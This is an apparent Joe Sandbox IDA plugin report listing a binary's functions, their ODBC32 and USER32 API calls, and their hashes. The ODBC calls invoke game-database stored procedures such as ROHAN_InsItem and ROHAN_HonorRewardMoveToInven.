                                                                                      • Instruction Fuzzy Hash: 76A190B4E00248AFDB04DF99D882FADB7B1FB48704F24805EE409AB395E7346D41CB59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsItem](?,?,?,?,?,?,?,?,?,?,?,?) } ,000000FD), ref: 0042C47D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042C4BF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042C4F7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042C52F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,0000002A,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042C56F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FE,000000FD,0000002A), ref: 0042C5A7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042C5DF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042C617
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042C64F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042C687
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042C6BF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C6F7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C72F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C764
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsItem](?,?,?,?,?,?,?,?,?,?,?,?) } , xrefs: 0042C474
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsItem](?,?,?,?,?,?,?,?,?,?,?,?) }
                                                                                      • API String ID: 0-1007469122
                                                                                      • Opcode ID: c3cb7c07e9c312d383eca4419aafddefdf811e019cd7c02e0e0e5d440cdb6337
                                                                                      • Instruction ID: f5f258510d52c160df41d17eac920dd5b64fdfc3efa7bbc56a66379ae2958dac
                                                                                      • Opcode Fuzzy Hash: c3cb7c07e9c312d383eca4419aafddefdf811e019cd7c02e0e0e5d440cdb6337
                                                                                      • Instruction Fuzzy Hash: 6491FCF0A442157BEB648B54CC52FAE7375EB84B18F20C688F7196F2C5DDB169808B2C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_HonorRewardMoveToInven]( ?,?,?,?,?,?,?,?,?,?,?,?)},000000FD), ref: 0043D21A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043D259
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043D291
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043D2C9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,0000002A,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043D309
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FE,000000FD,0000002A), ref: 0043D341
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043D379
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043D3B1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043D3E9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043D421
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043D459
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043D491
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043D4C9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043D4FE
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_HonorRewardMoveToInven]( ?,?,?,?,?,?,?,?,?,?,?,?)}, xrefs: 0043D211
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_HonorRewardMoveToInven]( ?,?,?,?,?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-3866585781
                                                                                      • Opcode ID: 7e1a55c29ac406cfac9717c5cefbbf1fff173e8b84547c2edf7fb22d0194210f
                                                                                      • Instruction ID: 2ac8f75eb688f5d28bbfd2f06e46265abdb06a9cb450d3d9202375a23d693a0b
                                                                                      • Opcode Fuzzy Hash: 7e1a55c29ac406cfac9717c5cefbbf1fff173e8b84547c2edf7fb22d0194210f
                                                                                      • Instruction Fuzzy Hash: 2F911FF06402557BEB248B44CC92FE97334FB84B58F208289F7597E2C9D6F969C08B18
                                                                                      APIs
                                                                                        • Part of subcall function 004A18F7: GetWindowLongA.USER32(?,000000F0), ref: 004A1902
                                                                                      • GetParent.USER32(?), ref: 0049E914
                                                                                      • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0049E937
                                                                                      • GetWindowRect.USER32(?,?), ref: 0049E950
                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 0049E963
                                                                                      • CopyRect.USER32(?,?), ref: 0049E9B0
                                                                                      • CopyRect.USER32(?,?), ref: 0049E9BA
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0049E9C3
                                                                                      • CopyRect.USER32(?,?), ref: 0049E9DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                      • String ID: ($@
                                                                                      • API String ID: 808654186-1311469180
                                                                                      • Opcode ID: 32b4f0c64a7f8516c60322cc357a09464266c4706b15aae2fe75d5cea36ee3d9
                                                                                      • Instruction ID: d842a6db33646ba3237f871f8a8e744c237fa7c4ff686e9505ee01cf46974abd
                                                                                      • Opcode Fuzzy Hash: 32b4f0c64a7f8516c60322cc357a09464266c4706b15aae2fe75d5cea36ee3d9
                                                                                      • Instruction Fuzzy Hash: 89518372900219AFDF50DBB9CC89EEEBBB9AF44314F15412AF505F3291DB34E9058B68
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044B564
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044B594
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044B5C4
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044B5F4
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044B624
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044B654
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044B684
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044B6B4
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044B6E4
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044B714
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044B744
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044B774
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?), ref: 0044B7A4
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,00000001,?), ref: 0044B7D6
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?), ref: 0044B809
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044B83C
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044B86E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a01bd6876d825f42c499c29d7e2977237d2924945408217e53cf0a7b909ff72
                                                                                      • Instruction ID: 1568cf19c39c64caf5f0eaf81107f399dfca5c2b8f62d983996023cca203e9ab
                                                                                      • Opcode Fuzzy Hash: 6a01bd6876d825f42c499c29d7e2977237d2924945408217e53cf0a7b909ff72
                                                                                      • Instruction Fuzzy Hash: 03A12EB8A02118ABDBA4DB09CC55FAA7335EF44718F60C2C8F6186B3D1DE71AD809F54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044B8BE
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044B8EE
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044B91E
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044B94E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044B97E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044B9AE
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044B9DE
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044BA0E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044BA3E
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044BA6E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044BA9E
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044BACE
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?), ref: 0044BAFE
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,00000001,?), ref: 0044BB30
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000E7,?), ref: 0044BB63
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044BB96
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044BBC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8be603a43c6cea8966ccf4531baf3a08507ba0285a9a8ff2ba68b4e95b6548d3
                                                                                      • Instruction ID: 47bea75f2cef4eff70a4572ed7fc200691c55eedb60551a435be0042801a09a1
                                                                                      • Opcode Fuzzy Hash: 8be603a43c6cea8966ccf4531baf3a08507ba0285a9a8ff2ba68b4e95b6548d3
                                                                                      • Instruction Fuzzy Hash: 34A1FBB5A0011CAFEB24DB09CD9AFAA7379FB84714F148288F61C6B3C1D671AD908F54
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsTItemHonor]( ?,?,?,?,?,?,?,?,?,? )},000000FD), ref: 0043CB87
